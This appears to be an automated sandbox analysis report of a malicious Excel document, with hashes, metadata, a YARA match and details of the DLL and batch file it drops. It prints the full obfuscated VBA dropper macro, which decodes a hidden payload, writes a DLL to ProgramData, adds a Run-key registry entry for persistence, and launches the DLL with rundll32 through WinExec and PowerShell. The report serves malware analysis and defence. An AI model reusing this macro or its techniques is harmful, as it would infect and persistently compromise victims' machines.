5ad401c3...90b7

Filters:

Filename	Category	Type	Severity	Actions

C:\Users\aETAdzjz\Desktop\Council-of-Europe-.xls

Sample File

Excel Document

Malicious

Mime Type	application/vnd.ms-excel
File Size	1.71 MB
MD5	c89eb0682aa568b8f3d8e5cde23e1fed
SHA1	35463c4d947f4a275416b22dd6a271fd0c99d94e
SHA256	5ad401c3a568bd87dd13f8a9ddc4e450ece61cd9ce4d1b23f68ce0b1f3c190b7
SSDeep	12288:P8RFy14R0yPXfaVhf8xUAuoTf4suMg5dBvPeiA7hJdf9NudvZt0dzzs97Z7KPMme:x4RO
ImpHash	-

Office Information

Create Time	2015-06-05 18:17:20+00:00
Modify Time	2020-04-07 07:54:22+00:00

Document Information

Codepage	ANSI_Latin1
Application	Microsoft Excel
App Version	15.0
Document Security	NONE
Titles Of Parts	Sheet1, Sheet2
scale_crop	False
shared_doc	False

Controls (1)

CLSID	Control Name	Associated Vulnerability
{00020820-0000-0000-C000-000000000046}	Excel97Sheet	-

VBA Macros (2)

Macro #1: Module1


                   Attribute VB_Name = "Module1"
Sub sa()

End Sub

Macro #2: ThisWorkbook


                   Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function SZpmrPBsT(h)
  Dim a: a = Split(h)
  Dim i
  For i = 0 To UBound(a)
      a(i) = Chr("&H" & a(i))
  Next
  h2s = Join(a, "")
  SZpmrPBsT = h2s
End Function

Sub Workbook_Open()
    mykk = "qnZeVsoOpmeN"
    Dim g
    d = "MsgBox ('Invalid User and Passwdord')"
    Dim AC
    For i = 1 To 70
        Celles = "A" + CStr(i)
        A1 = ThisWorkbook.Sheets("Sheet2").Range(Celles).Value
        If A1 = "" Then
            Exit For
        End If
        AC = AC + A1
    Next i
    Dim o
    d = "MsgBox ('Please login')"
    Set Ofile = CreateObject("Scripting.FileSystemObject")
    o = xoAOvMNPSVo(mykk, AC)
    Dim dd
    dd = SZpmrPBsT("43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 44 61 74 61 45 78 63 68 61 6e 67 65 2e 64 6c 6c")
    lkd = hMqirSfTAmm(o)
    Set WText = Ofile.CreateTextFile(dd)
    WText.WriteLine Left(lkd, Len(lkd) - 1)
    WText.Close
    Dim func
    func = SZpmrPBsT("43 41 4c 4c")
    Dim lib
    lib = SZpmrPBsT("4b 65 72 6e 65 6c 33 32")
    Dim ok
    ok = SZpmrPBsT("57 69 6e 45 78 65 63")
    Dim go
    Dim goo
    goo = SZpmrPBsT("52 45 47 20 41 44 44 20 48 4b 43 55 5c 53 6f 66 74 77 61 72 65 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 52 75 6e 20 2f 76 20 41 75 74 6f 53 74 61 72 74 20 2f 74 20 52 45 47 5f 53 5a 20 2f 64 20 22 72 75 6e 64 6c 6c 33 32 2e 65 78 65 20 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 44 61 74 61 45 78 63 68 61 6e 67 65 2e 64 6c 6c 2c 53 74 61 72 74 22")
    Set WText = Ofile.CreateTextFile(SZpmrPBsT("43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 74 74 2e 62 61 74"))
    WText.WriteLine goo
    WText.Close
    Dim lets
    lets = SZpmrPBsT("63 6d 64 2e 65 78 65 20 2f 63 20 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 74 74 2e 62 61 74")
    Application.ExecuteExcel4Macro Replace(Replace(Replace(Replace("{{}}(""[]"", ""{^}"", ""JCCJ"", ""[*]"", 0)", "{{}}", func), "[]", lib), "{^}", ok), "[*]", lets)
    go = SZpmrPBsT("70 6f 77 65 72 73 68 65 6c 6c 20 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 72 75 6e 64 6c 6c 33 32 2e 65 78 65 20 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 44 61 74 61 45 78 63 68 61 6e 67 65 2e 64 6c 6c 2c 53 74 61 72 74")
    Application.ExecuteExcel4Macro Replace(Replace(Replace(Replace("{{}}(""[]"", ""{^}"", ""JCCJ"", ""[*]"", 0)", "{{}}", func), "[]", lib), "{^}", ok), "[*]", go)
    d = "MsgBox ('This is a valid password.')"

End Sub

Function xoAOvMNPSVo(yy, msg)
    Dim outre
    Dim intCoun
    a = Split(msg, ",")
    msg_len = UBound(a)
    Dim x
    For x = 0 To msg_len
        key_a = Mid(yy, intCoun + 1, 1)
        If intCoun = Len(yy) Then
            intCoun = 0
            key_a = Mid(yy, intCoun + 1, 1)
        End If
        intCoun = intCoun + 1
        Dim ll
        ll = CInt("&H" & Replace(a(x), "0x", ""))
        fg = ll - (Asc(key_a) + 256) Mod 256
        gdd_a = Chr(fg)
        outre = outre + gdd_a
    Next
    xoAOvMNPSVo = outre
End Function

Function hMqirSfTAmm(ss)
        brt = SZpmrPBsT("41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f")
        Dim stringlen, resOut, grpBegin
        stringlen = Len(ss) - 1
        newstring = Left(ss, stringlen)
        For grpBegin = 1 To stringlen Step 4
               Dim numDataBytes, CharCounter, Oo, Pp, nGcount, pOut
               numDataBytes = 3
               nGcount = 0
               For CharCounter = 0 To 3
                   Oo = Mid(newstring, grpBegin + CharCounter, 1)
                   If Oo = "=" Then
                       numDataBytes = numDataBytes - 1
                        Pp = 0
                    Else
                        Pp = InStr(1, brt, Oo, vbBinaryCompare) - 1
                    End If
                    Dim tr
                    tr = 64 * nGcount
                    nGcount = tr + Pp
                Next
           nGcount = Hex(nGcount)
           Dim ds
           ds = String(6 - Len(nGcount), "0")
           nGcount = ds & nGcount
           Dim po
           po = CByte("&H" & Mid(nGcount, 1, 2))
           pOut = Chr(po)
           pOut = pOut + Chr(CByte("&H" & Mid(nGcount, 3, 2)))
           pOut = pOut + Chr(CByte("&H" & Mid(nGcount, 5, 2)))
           resOut = resOut & Left(pOut, numDataBytes)
       Next
       hMqirSfTAmm = resOut
End Function

YARA Matches (1)

Rule Name	Rule Description	Classification	Score	Actions
VBA_Create_File	VBA macro contains file creation commands; possible dropper	-	2/5	... YARA Actions Show Ruleset Show Match

C:\ProgramData\DataExchange.dll

Dropped File

Binary

Unknown

Mime Type	application/vnd.microsoft.portable-executable
File Size	235.00 KB
MD5	959e28f5cb3fea8299bf2fe3ec268ebb
SHA1	6c5ff79550fb4c0acc71c3c6da3dc5afe6fea822
SHA256	2361ee9c49fbe2a6302b3b01c1cc5893359ccee2782be42976d9e6f5efb14d84
SSDeep	3072:dLLijkWk0Uj1HxOob/90B7JdNHZUsfLcG+EcskoGmlu6gAg0FubPyyjBnas1UaAB:dmkzkPNys4G+EcsyAOj/jBhiaY
ImpHash	4efff83e30680d340096e552cf53aedc

PE Information

Image Base	0x10000000
Entry Point	0x1000f046
Size Of Code	0x26a00
Size Of Initialized Data	0x14e00
File Type	FileType.dll
Subsystem	Subsystem.windows_cui
Machine Type	MachineType.i386
Compile Timestamp	2020-04-06 11:07:00+00:00

Sections (6)

Name	Virtual Address	Virtual Size	Raw Data Size	Raw Data Offset	Flags	Entropy
.text	0x10001000	0x26813	0x26a00	0x400	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ	6.62
.rdata	0x10028000	0xf3c6	0xf400	0x26e00	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ	5.63
.data	0x10038000	0x1d28	0xe00	0x36200	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE	3.72
.tls	0x1003a000	0x13a5	0x1400	0x37000	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE	0.0
.rsrc	0x1003c000	0x1e0	0x200	0x38400	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ	4.72
.reloc	0x1003d000	0x24d8	0x2600	0x38600	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ	6.5

Imports (6)

KERNEL32.dll (82)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
CreatePipe	0x0	0x10028018	0x36b64	0x35964	0xda
PeekNamedPipe	0x0	0x1002801c	0x36b68	0x35968	0x413
MultiByteToWideChar	0x0	0x10028020	0x36b6c	0x3596c	0x3e0
CloseHandle	0x0	0x10028024	0x36b70	0x35970	0x84
CreateProcessW	0x0	0x10028028	0x36b74	0x35974	0xe2
WriteFile	0x0	0x1002802c	0x36b78	0x35978	0x5fc
CreateFileW	0x0	0x10028030	0x36b7c	0x3597c	0xc8
WideCharToMultiByte	0x0	0x10028034	0x36b80	0x35980	0x5e8
ReadFile	0x0	0x10028038	0x36b84	0x35984	0x463
GetComputerNameW	0x0	0x1002803c	0x36b88	0x35988	0x1da
GetVersion	0x0	0x10028040	0x36b8c	0x3598c	0x30f
FlushFileBuffers	0x0	0x10028044	0x36b90	0x35990	0x19a
SetFilePointerEx	0x0	0x10028048	0x36b94	0x35994	0x512
GetConsoleMode	0x0	0x1002804c	0x36b98	0x35998	0x1f7
GetConsoleCP	0x0	0x10028050	0x36b9c	0x3599c	0x1e5
HeapSize	0x0	0x10028054	0x36ba0	0x359a0	0x344
SetStdHandle	0x0	0x10028058	0x36ba4	0x359a4	0x539
Sleep	0x0	0x1002805c	0x36ba8	0x359a8	0x56a
VirtualAlloc	0x0	0x10028060	0x36bac	0x359ac	0x5b3
FreeEnvironmentStringsW	0x0	0x10028064	0x36bb0	0x359b0	0x1a5
GetEnvironmentStringsW	0x0	0x10028068	0x36bb4	0x359b4	0x230
GetCommandLineW	0x0	0x1002806c	0x36bb8	0x359b8	0x1d2
WriteConsoleW	0x0	0x10028070	0x36bbc	0x359bc	0x5fb
VirtualFree	0x0	0x10028074	0x36bc0	0x359c0	0x5b6
EnterCriticalSection	0x0	0x10028078	0x36bc4	0x359c4	0x12d
LeaveCriticalSection	0x0	0x1002807c	0x36bc8	0x359c8	0x3b0
DeleteCriticalSection	0x0	0x10028080	0x36bcc	0x359cc	0x10c
EncodePointer	0x0	0x10028084	0x36bd0	0x359d0	0x129
DecodePointer	0x0	0x10028088	0x36bd4	0x359d4	0x105
SetLastError	0x0	0x1002808c	0x36bd8	0x359d8	0x521
InitializeCriticalSectionAndSpinCount	0x0	0x10028090	0x36bdc	0x359dc	0x354
CreateEventW	0x0	0x10028094	0x36be0	0x359e0	0xbc
TlsAlloc	0x0	0x10028098	0x36be4	0x359e4	0x58b
TlsGetValue	0x0	0x1002809c	0x36be8	0x359e8	0x58d
TlsSetValue	0x0	0x100280a0	0x36bec	0x359ec	0x58e
TlsFree	0x0	0x100280a4	0x36bf0	0x359f0	0x58c
GetSystemTimeAsFileTime	0x0	0x100280a8	0x36bf4	0x359f4	0x2e1
GetModuleHandleW	0x0	0x100280ac	0x36bf8	0x359f8	0x270
GetProcAddress	0x0	0x100280b0	0x36bfc	0x359fc	0x2a6
LCMapStringW	0x0	0x100280b4	0x36c00	0x35a00	0x3a4
GetLocaleInfoW	0x0	0x100280b8	0x36c04	0x35a04	0x25d
GetStringTypeW	0x0	0x100280bc	0x36c08	0x35a08	0x2cf
GetCPInfo	0x0	0x100280c0	0x36c0c	0x35a0c	0x1bc
SetEvent	0x0	0x100280c4	0x36c10	0x35a10	0x505
ResetEvent	0x0	0x100280c8	0x36c14	0x35a14	0x4b6
WaitForSingleObjectEx	0x0	0x100280cc	0x36c18	0x35a18	0x5c5
UnhandledExceptionFilter	0x0	0x100280d0	0x36c1c	0x35a1c	0x59a
SetUnhandledExceptionFilter	0x0	0x100280d4	0x36c20	0x35a20	0x55b
GetCurrentProcess	0x0	0x100280d8	0x36c24	0x35a24	0x212
TerminateProcess	0x0	0x100280dc	0x36c28	0x35a28	0x579
IsProcessorFeaturePresent	0x0	0x100280e0	0x36c2c	0x35a2c	0x37b
IsDebuggerPresent	0x0	0x100280e4	0x36c30	0x35a30	0x374
GetStartupInfoW	0x0	0x100280e8	0x36c34	0x35a34	0x2c8
QueryPerformanceCounter	0x0	0x100280ec	0x36c38	0x35a38	0x43e
GetCurrentProcessId	0x0	0x100280f0	0x36c3c	0x35a3c	0x213
GetCurrentThreadId	0x0	0x100280f4	0x36c40	0x35a40	0x217
InitializeSListHead	0x0	0x100280f8	0x36c44	0x35a44	0x358
RtlUnwind	0x0	0x100280fc	0x36c48	0x35a48	0x4c2
RaiseException	0x0	0x10028100	0x36c4c	0x35a4c	0x453
GetLastError	0x0	0x10028104	0x36c50	0x35a50	0x259
FreeLibrary	0x0	0x10028108	0x36c54	0x35a54	0x1a6
LoadLibraryExW	0x0	0x1002810c	0x36c58	0x35a58	0x3b6
InterlockedFlushSList	0x0	0x10028110	0x36c5c	0x35a5c	0x361
HeapAlloc	0x0	0x10028114	0x36c60	0x35a60	0x33b
HeapReAlloc	0x0	0x10028118	0x36c64	0x35a64	0x342
HeapFree	0x0	0x1002811c	0x36c68	0x35a68	0x33f
ExitProcess	0x0	0x10028120	0x36c6c	0x35a6c	0x159
GetModuleHandleExW	0x0	0x10028124	0x36c70	0x35a70	0x26f
GetModuleFileNameA	0x0	0x10028128	0x36c74	0x35a74	0x26b
GetACP	0x0	0x1002812c	0x36c78	0x35a78	0x1ad
GetStdHandle	0x0	0x10028130	0x36c7c	0x35a7c	0x2ca
GetFileType	0x0	0x10028134	0x36c80	0x35a80	0x247
IsValidLocale	0x0	0x10028138	0x36c84	0x35a84	0x382
GetUserDefaultLCID	0x0	0x1002813c	0x36c88	0x35a88	0x308
EnumSystemLocalesW	0x0	0x10028140	0x36c8c	0x35a8c	0x14f
GetProcessHeap	0x0	0x10028144	0x36c90	0x35a90	0x2ac
FindClose	0x0	0x10028148	0x36c94	0x35a94	0x170
FindFirstFileExA	0x0	0x1002814c	0x36c98	0x35a98	0x175
FindNextFileA	0x0	0x10028150	0x36c9c	0x35a9c	0x185
IsValidCodePage	0x0	0x10028154	0x36ca0	0x35aa0	0x380
GetOEMCP	0x0	0x10028158	0x36ca4	0x35aa4	0x28f
GetCommandLineA	0x0	0x1002815c	0x36ca8	0x35aa8	0x1d1

USER32.dll (1)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
wsprintfW	0x0	0x10028164	0x36cb0	0x35ab0	0x3ac

ADVAPI32.dll (1)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
GetUserNameA	0x0	0x10028000	0x36b4c	0x3594c	0x179

bcrypt.dll (7)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
BCryptHashData	0x0	0x1002816c	0x36cb8	0x35ab8	0x23
BCryptFinishHash	0x0	0x10028170	0x36cbc	0x35abc	0x1b
BCryptOpenAlgorithmProvider	0x0	0x10028174	0x36cc0	0x35ac0	0x27
BCryptGetProperty	0x0	0x10028178	0x36cc4	0x35ac4	0x21
BCryptCreateHash	0x0	0x1002817c	0x36cc8	0x35ac8	0x6
BCryptCloseAlgorithmProvider	0x0	0x10028180	0x36ccc	0x35acc	0x2
BCryptDestroyHash	0x0	0x10028184	0x36cd0	0x35ad0	0xd

DNSAPI.dll (1)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
DnsQuery_A	0x0	0x10028008	0x36b54	0x35954	0x5f

IPHLPAPI.DLL (1)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
GetAdaptersInfo	0x0	0x10028010	0x36b5c	0x3595c	0x40

Exports (1)

Api name	EAT Address	Ordinal
Start	0x63b0	0x1

C:\ProgramData\tt.bat

Dropped File

Batch

Unknown

Mime Type	application/x-bat
File Size	139 Bytes
MD5	36dc19d145b4b39a24150055080e47bf
SHA1	e02effb961a3e9d8994f21b008e959045465f03c
SHA256	8f93f7e1f6865e41ae718899718fb4ff9116d5986eb83a7fe6dad54595d4fb02
SSDeep	3:28D9so3KRfyM1K7eDBFaRwRyid4JL4AcfDKCkRERrcKaov:rtuH1jGwUidYkjfao1jv
ImpHash	-

There are no files for this filter

There are no files in this analysis

WHOIS Domain Information

Before

After